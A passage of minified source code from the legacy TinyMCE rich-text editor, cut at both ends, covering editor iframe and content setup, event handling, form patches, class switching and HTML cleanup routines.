aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new 